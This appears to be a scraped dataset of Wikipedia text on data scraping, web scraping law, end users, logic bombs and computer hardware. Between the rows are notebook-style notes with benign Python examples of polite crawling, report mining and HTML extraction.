On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping.[27] The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs.[28] In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses.[29][30] Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping would be a violation of contract law. It would also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
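The scraped passage above ends by noting that site administrators can deploy measures to stop or slow bots. On the scraper's side, the practical counterpart is to crawl politely: consult robots.txt before fetching and throttle the request rate so the target server is not overloaded. The sketch below is only a minimal illustration, built from requests and time (already imported in this notebook) plus urllib.robotparser from the standard library; the target URL, User-Agent string, and two-second delay are placeholder assumptions, not values taken from any site discussed above.
# Minimal politeness sketch (assumptions: example.com is a hypothetical target,
# the User-Agent string and 2-second delay are arbitrary illustrative choices).
import time
import requests
from urllib.robotparser import RobotFileParser
BASE_URL = "https://example.com"        # hypothetical site to scrape
USER_AGENT = "my-research-scraper/0.1"  # identify the bot honestly
CRAWL_DELAY = 2                         # seconds between requests (conservative default)
# Read robots.txt once, before fetching any pages.
rp = RobotFileParser()
rp.set_url(BASE_URL + "/robots.txt")
rp.read()
def polite_get(path):
    url = BASE_URL + path
    if not rp.can_fetch(USER_AGENT, url):
        print(f"robots.txt disallows {url}; skipping")
        return None
    # Throttle so the site is not flooded with requests.
    time.sleep(CRAWL_DELAY)
    return requests.get(url, headers={"User-Agent": USER_AGENT}, timeout=10)
response = polite_get("/some/page.html")
if response is not None:
    print(response.status_code)
In a real crawl one would typically also honour a Crawl-delay directive when the site publishes one, and back off on HTTP 429 or 503 responses.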
509 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-6 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration).[1] Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends.[2] Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple case where the controlling program navigates through the user interface, or a more complex scenario where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing.
Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g., change control, security, user management, data protection, operational audit, load balancing, and queue management—could be said to be an example of robotic process automation software, called RPA, or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data into numeric data for inclusion in calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally, Reuters used the term "logicized" for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer.[3] More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or, for some specialised automated testing systems, matching the screen's bitmap data against expected results.[4] This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation of these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping.[5] Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website.[6] Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner.[7]
Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information.[8][9] Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers.[10] Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining.[11] This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
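The report-mining description in the row above (extracting data from static, human-readable report files rather than from a live system) can be illustrated with a short pandas sketch. The fixed-width report text, file contents, and column names below are invented purely for illustration; pandas.read_fwf is used here because it can infer the fixed-width column boundaries typical of spooled print output.
# Report-mining sketch: parse a fixed-width, human-readable text report into a DataFrame.
# The report layout and values are hypothetical examples, not data from this notebook's scrape.
from io import StringIO
import pandas as pd
# Pretend this text was spooled from a legacy system's print output.
report_text = """\
ORDER  CUSTOMER     AMOUNT
10001  Acme Corp    125.50
10002  Globex Ltd   87.25
10003  Initech      430.00
"""
# read_fwf infers the fixed-width column boundaries from the whitespace pattern.
df = pd.read_fwf(StringIO(report_text))
df["AMOUNT"] = df["AMOUNT"].astype(float)
print(df)
print("Total amount:", df["AMOUNT"].sum())
The same idea extends to reports captured as PDF or HTML: convert them to text first, then parse the resulting layout offline instead of querying the source system directly.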
516 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Software | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a common URL scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as XPath can be used to parse the resulting DOM tree. There are several companies that have developed vertical-specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical, and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually the number of fields) and its scalability (how quickly it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 A newer approach uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers.
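As a rough illustration of two of the approaches mentioned above, regular-expression matching and DOM parsing with XPath, the sketch below uses Python's built-in re module and the third-party lxml package. lxml is an assumed extra dependency (it is not installed in the setup cells of this notebook), and the HTML fragment and selectors are invented purely for demonstration.
import re

# A toy HTML fragment; in practice this would come from an HTTP response body.
html = '<ul><li class="price">$19.99</li><li class="price">$24.50</li></ul>'

# Regular-expression approach: match dollar amounts directly in the raw markup.
prices = re.findall(r"\$\d+(?:\.\d{2})?", html)
print(prices)  # ['$19.99', '$24.50']

# DOM/XPath approach (assumes lxml is installed: pip install lxml).
from lxml import html as lxml_html
tree = lxml_html.fromstring(html)
print(tree.xpath('//li[@class="price"]/text()'))  # ['$19.99', '$24.50']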
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
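As a sketch of what a spider for one of the frameworks named above might look like, here is a minimal Scrapy example. Scrapy is an assumed additional dependency (it is not installed earlier in this notebook), and quotes.toscrape.com is a public practice site used here purely for illustration.
import scrapy

class QuotesSpider(scrapy.Spider):
    # A minimal spider: extract each quote's text and author, then follow pagination.
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]

    def parse(self, response):
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }
        next_page = response.css("li.next a::attr(href)").get()
        if next_page:
            yield response.follow(next_page, callback=self.parse)

# Run from a shell with: scrapy runspider quotes_spider.py -o quotes.json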
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., in the United States District Court for the Eastern District of Virginia, the court ruled that the terms of use should be brought to the users' attention in order for a browse wrap contract or license to be enforced.
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms of use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider it in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping would be a violation of contract law. It would also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
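The row above ends by noting that site administrators can take measures to stop or slow bots (the list itself is truncated in the scraped text). As a small, hedged sketch of the cooperative counterpart on the scraper's side, the snippet below checks robots.txt and paces requests using Python's standard urllib.robotparser and time modules; the user-agent string, URLs, and delay are illustrative assumptions.
import time
from urllib.robotparser import RobotFileParser

USER_AGENT = "example-research-bot"  # illustrative user-agent string

def allowed_to_fetch(url, robots_url):
    # Read the site's robots.txt and ask whether this user agent may fetch the URL.
    parser = RobotFileParser()
    parser.set_url(robots_url)
    parser.read()
    return parser.can_fetch(USER_AGENT, url)

if allowed_to_fetch("https://en.wikipedia.org/wiki/Web_scraping",
                    "https://en.wikipedia.org/robots.txt"):
    # Pause between requests to avoid overloading the server.
    time.sleep(1.0)
    # ... fetch the page here ...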
517 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Category:Articles_containing_potentially_dated_statements_from_2007 | Articles in this category contain statements that may become dated originating from 2007. These may need to be updated, removed, or put into context as historical. Articles containing older statements are more likely to be dated. This is not a backlog; not all articles in this category will need updating at this point in time. Use As of to mark all individual statements that may become dated, this will automatically add them to the appropriate categories. Wherever possible, use Update after to mark exactly when statements will need updating in addition to using As of . This category has the following 12 subcategories, out of 12 total. The following 200 pages are in this category, out of approximately 2,189 total. This list may not reflect recent changes. |
518 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/End-user_(computer_science) | In product development, an end user (sometimes end-user) a is a person who ultimately uses or is intended to ultimately use a product. 1 2 3 The end user stands in contrast to users who support or maintain the product, 4 such as sysops, system administrators, database administrators, 5 information technology (IT) experts, software professionals, and computer technicians. End users typically do not possess the technical understanding or skill of the product designers, 6 a fact easily overlooked and forgotten by designers: leading to features creating low customer satisfaction. 2 In information technology, end users are not customers in the usual sense—they are typically employees of the customer. 7 For example, if a large retail corporation buys a software package for its employees to use, even though the large retail corporation was the customer that purchased the software, the end users are the employees of the company, who will use the software at work. End users are one of the three major factors contributing to the complexity of managing information systems. The end user's position has changed from a position in the 1950s (where end users did not interact with the mainframe; computer experts programmed and ran the mainframe) to one in the 2010s where the end user collaborates with and advises the management information system and Information Technology department about his or her needs regarding the system or product. This raises new questions, such as: Who manages each resource?, What is the role of the MIS Department? and What is the optimal relationship between the end-user and the MIS Department? 8 The concept of end-user first surfaced in the late 1980s and has since then raised many debates. One challenge was the goal to give both the user more freedom, by adding advanced features and functions (for more advanced users) and adding more constraints (to prevent a neophyte user from accidentally erasing an entire company's database). 9 This phenomenon appeared as a consequence of consumerization of computer products and software. In the 1960s and 1970s, computer users were generally programming experts and computer scientists. However, in the 1980s, and especially in the mid-to-late 1990s and the early 2000s, everyday, regular people began using computer devices and software for personal and work use. IT specialists needed to cope with this trend in various ways. In the 2010s, users now want to have more control over the systems they operate, to solve their own problems, and be able to customize the systems to suit their needs. The apparent drawbacks were the risk of corruption of the systems and data the users had control of, due to their lack of knowledge on how to properly operate the computer software at an advanced level. 10 For companies to appeal to the user, it took primary care to accommodate and think of end-users in their new products, software launches, and updates. A partnership needed to be formed between the programmer-developers and the everyday end users so both parties could maximize the use of the products effectively. 11 A major example of the public's effects on end user's requirements were the public libraries. They have been affected by new technologies in many ways, ranging from the digitalization of their card catalog, the shift to e-books, e-journals, and offering online services. 
Libraries have had to undergo many changes in order to cope, 12 ranging from training existing librarians in Web 2.0 and database skills to hiring IT and software experts. The aim of end user documentation (e.g., manuals and guidebooks for products) is to help the user understand certain aspects of the systems and to provide all the answers in one place. 13 A lot of documentation is available for users to help them understand and properly use a certain product or service. Because the information available is usually vast, inconsistent, or ambiguous (e.g., a user manual with hundreds of pages, including guidance on using advanced features), many users suffer from an information overload. Therefore, they become unable to take the right course of action. This needs to be kept in mind when developing products and services and the necessary documentation for them. 14 Well-written documentation is needed for a user to reference. Some key aspects of such documentation are: 13 At times users do not refer to the documentation available to them for various reasons, ranging from finding the manual too large to not understanding the jargon and acronyms it contains. In other cases, the users may find that the manual makes too many assumptions about a user having pre-existing knowledge of computers and software, and thus the directions may skip over these initial steps (from the users' point of view). Thus, frustrated users may report false problems because of their inability to understand the software or computer hardware. This in turn causes the company to focus on perceived problems instead of focusing on the actual problems of the software. 15 In the 2010s, there is a lot of emphasis on users' security and privacy. With the increasing role that computers are playing in people's lives, people are carrying laptops and smartphones with them and using them for scheduling appointments, making online purchases using credit cards and searching for information. These activities can potentially be observed by companies, governments or individuals, which can lead to breaches of privacy, identity theft, blackmailing, and other serious concerns. As well, many businesses, ranging from small business startups to huge corporations, are using computers and software to design, manufacture, market and sell their products and services, and businesses also use computers and software in their back office processes (e.g., human resources, payroll, etc.). As such, it is important for people and organizations to know that the information and data they are storing, using, or sending over computer networks or storing on computer systems is secure. However, developers of software and hardware are faced with many challenges in developing a system that is user friendly, accessible 24/7 on almost any device, and truly secure. Security leaks happen, even to individuals and organizations that have security measures in place to protect their data and information (e.g., firewalls, encryption, strong passwords). The complexities of creating such a secure system come from the fact that the behaviour of humans is not always rational or predictable. Even in a very well-secured computer system, a malicious individual can telephone a worker and pretend to be a private investigator working for the software company, and ask for the individual's password, a dishonest process called phishing. 
As well, even with a well-secured system, if a worker decides to put the company's electronic files on a USB drive to take them home to work on them over the weekend (against many companies' policies), and then loses this USB drive, the company's data may be compromised. Therefore, developers need to make systems that are intuitive to the user in order to have information security and system security. 16 Another key step to end user security is informing the people and employees about the security threats and what they can do to avoid them or protect themselves and the organization. Clearly underlining the capabilities and risks makes users more aware and informed whilst they are using the products. Some situations that could put the user at risk are: Even if the security measures in place are strong, the choices the user makes and his or her behavior have a major impact on how secure their information really is. Therefore, an informed user is one who can protect and achieve the best security out of the system they use. 17 Because of the importance of end-user security and the impact it can have on organizations, the UK government set out guidance for the public sector, to help civil servants learn how to be more security aware when using government networks and computers. While this is targeted to a certain sector, this type of educational effort can be informative to any type of user. This helps developers meet security norms and end users be aware of the risks involved. 18 Reimers and Andersson have conducted a number of studies on end-user security habits and found that the same type of repeated education and training in security best practices can have a marked effect on the perception of compliance with good end-user network security habits, especially concerning malware and ransomware. 19 In end-user license agreements, the end user is distinguished from the value-added reseller, who installs the software, or the organization that purchases and manages the software. 20 failed verification Certain American defense-related products and information require export approval from the United States Government under the International Traffic in Arms Regulations and Export Administration Regulations. 21 In order to obtain a license to export, the exporter must specify both the end user and the end use for undertaking an end-user certificate. 22 In the UK, there exist documents that accompany licenses for products named in the end user undertaking statements. clarification needed 23 |
519 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Logic_bomb | A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. For example, a programmer may hide a piece of code that starts deleting files (such as a salary database trigger), should they ever be terminated from the company. Software that is inherently malicious, such as viruses and worms, often contain logic bombs that execute a certain payload at a pre-defined time or when some other condition is met. This technique can be used by a virus or worm to gain momentum and spread before being noticed. Some viruses attack their host systems on specific dates, such as Friday the 13th or April Fools' Day. Trojans and other computer viruses that activate on certain dates are often called "time bombs". To be considered a logic bomb, the payload should be unwanted and unknown to the user of the software. As an example, trial programs with code that disables certain functionality after a set time are not normally regarded as logic bombs. Thomas C. Reed wrote in his 2004 book At the Abyss: An Insider's History of the Cold War that in 1982, a sabotage occurred on the Trans-Siberian Pipeline because of a logic bomb. According to Reed, a KGB operative stole the plans for a sophisticated control system and its software from a Canadian firm, for use on its Siberian pipeline. The Central Intelligence Agency (CIA) was tipped off by documents in the Farewell Dossier, and had the company insert a logic bomb in the program for sabotage purposes. 20 21 Critics have contested the authenticity of this account, 22 23 and it was reported that the story may be a hoax. 24 |
520 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_hardware | Computer hardware includes the physical parts of a computer, such as the central processing unit (CPU), random access memory (RAM), motherboard, computer data storage, graphics card, sound card, and computer case. It includes external devices such as a monitor, mouse, keyboard, and speakers. 1 2 By contrast, software is the set of instructions that can be stored and run by hardware. Hardware is so-termed because it is hard or rigid with respect to changes, whereas software is soft because it is easy to change. Hardware is typically directed by the software to execute any command or instruction. A combination of hardware and software forms a usable computing system, although other systems exist with only hardware. Early computing devices more complicated than the ancient abacus date to the seventeenth century. French mathematician Blaise Pascal designed a gear-based device that could add and subtract, selling around 50 models. The stepped reckoner was invented by Gottfried Leibniz by 1676, which could also divide and multiply. Due to the limitations of contemporary fabrication and design flaws, Leibniz' reckoner was not very functional, but similar devices (Leibniz wheel) remained in use into the 1970s. 3 In the 19th century, Englishman Charles Babbage invented the difference engine, a mechanical device to calculate polynomials for astronomical purposes. 4 Babbage also designed a general-purpose computer that was never built. Much of the design was incorporated into the earliest computers: punch cards for input and output, memory, an arithmetic unit analogous to central processing units, and even a primitive programming language similar to assembly language. 5 In 1936, Alan Turing developed the universal Turing machine to model any type of computer, proving that no computer would be able to solve the decision problem. 6 The universal Turing machine was a type of stored-program computer capable of mimicking the operations of any Turing machine (computer model) based on the software instructions passed to it. The storage of computer programs is key to the operation of modern computers and is the connection between computer hardware and software. 7 Even prior to this, in the mid 19th century mathematician George Boole invented Boolean algebra—a system of logic where each proposition is either true or false. Boolean algebra is now the basis of the circuits that model the transistors and other components of integrated circuits that make up modern computer hardware. 8 In 1945, Turing finished the design for a computer (the Automatic Computing Engine) that was never built. 9 Around this time, technological advancement in relays and vacuum tubes enabled the construction of the first computers. 10 Building on Babbage's design, relay computers were built by George Stibitz at Bell Laboratories and Harvard University's Howard Aiken, who engineered the MARK I. 5 Also in 1945, mathematician John von Neumann—working on the ENIAC project at the University of Pennsylvania—devised the underlying von Neumann 